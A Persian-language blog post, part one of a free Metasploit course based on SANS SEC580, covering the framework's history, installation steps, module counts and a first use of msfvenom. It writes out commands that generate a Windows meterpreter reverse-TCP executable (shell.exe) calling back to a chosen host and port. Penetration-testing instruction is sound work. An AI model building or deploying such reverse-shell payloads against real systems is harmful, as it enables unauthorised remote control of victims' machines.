آموزش SEC580 – بخش اول
سلام خدمت شما
امروز تصمیم گرفتم که دوره SEC580 رو به صورت متنی در وب سایت شخصی خودم منتشر کنم تا چراغ راهی باشه برای علاقهمندان به مباحث تست نفوذ از طریق متاسپلویت که بتوانند به صورت رایگان به این محتوای ارزشمند دسترسی داشته باشند.
با توجه به درگیریهای کاری سعی می کنم هر هفته ۱ تا ۲ پارت از این آموزش را منتشر کنم.دوره به صورت فشرده و کوتاه خواهد بود.
دوره آموزشی SEC580 از دورههای موسسه SANS است که به آموزش ابزار قدرتمند متاسپلویت می پردازد.
ابتدا باید ببینیم متاسپلویت چیست؟
متاسپلویت در ژوئیه سال ۲۰۰۳ ایجاد شد است. نسخه ۱٫۰ نوشته شده با زبان پرل و شامل رابط کاربری گرافیکی بر اساس curses است. نسخه سوم بهطور کامل به زبان روبی بازنویسی شد و توسط Metasploit, LLC توسعه یافت. (تأسیس شده توسط توسعه دهندگان در سال ۲۰۰۶).
شما با استفاده از این فریم ورك میتوانید آسیب پذیریهاي موجود در سیستمها، پروتکلها و نرم افزارهاي مختلف را شناسایی کرده و آنها را مورد نفوذ و یا حمله قرار دهید.
این اپلیکیشن به صورت پیش فرض دارای اکسپلویتهاي بسیاری میباشد ولی علاوه بر آن شما میتوانید اکسپلویت مورد نظر خودتان را ایجاد و به آن اضافه کنید.
نصب فریم ورک متاسپلویت
این فریم ورک به صورت پیش فرض در سیستم عامل کالی لینوکس وجود دارد و شما میتوانید به راحتی از آن استفاده کنید.
اما اگر مایل به نصب متاسپلویت بر روی توزیع دیگری از لینوکس هستید، مشکلی وجود ندارد.باید به این شکل عمل کنید.
sudo apt-get install gpgv2 autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl postgresql postgresql-contrib wget xsel zlib1g zlib1g-dev
پس از نصب وارد لینک زیر شوید و فایل metasploit.run را دانلود کنید
https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version
به ترتیب دستورات را وارد کنید:
mkdir /opt/metasploit
mv metasploit.run /opt/metasploit
chmod +x metasploit.run
./metasploit.run
پس نصب دستور msfconsole را وارد کنید تا محیط متاسپلویت برای شما اجرا شود.
حال نیاز است که با بخشهای مختلف این فریم ورک آشنا شویم.
متاسپلویت دارای ماژول های مختلفی و تقسیم بندی های مختلفی است که به شرح زیر می باشند تعداد ۱۸۸۶ اکسپلویت، تعداد ۱۰۶۵ Auxiliary ، تعداد ۳۲۸ ماژولPost ، تعداد ۵۴۶ Payload و تعداد ۴۴ encoder و ۱۰ Nops و ۲ evasion.
متااسپلویت چندین رابط کاربری دارد. در گذشته رابط های آن بیشتر بود برای مثال msfcli و msfencode که جای خود را به msfpayload دادند.
بریم سراغ تست ابزار:
قصد دارم یک Payload برای سیستم عامل ویندوز با استفاده از msfpayload ایجاد کنم. این رابط کاربری متاسپلویت وظیفه msfcli و msfencode را انجام می دهد.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
با استفاده از سوییچ -p ، Payload مد نظر را تعیین میکنیم. به جای<Local Port> یک Port را وارد کنید برای مثال ۴۴۴۴٫
به جای Local IP Address درواقع IP سیستم خود را وارد کنید.
با استفاده از سوییچ -f فرمت فایل و در آخر هم خروجی را در یک فایل exe با نام shell قرار دادیم .
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.40 LPORT=4444 -f exe > shell.exe
دیدگاهتان را بنویسید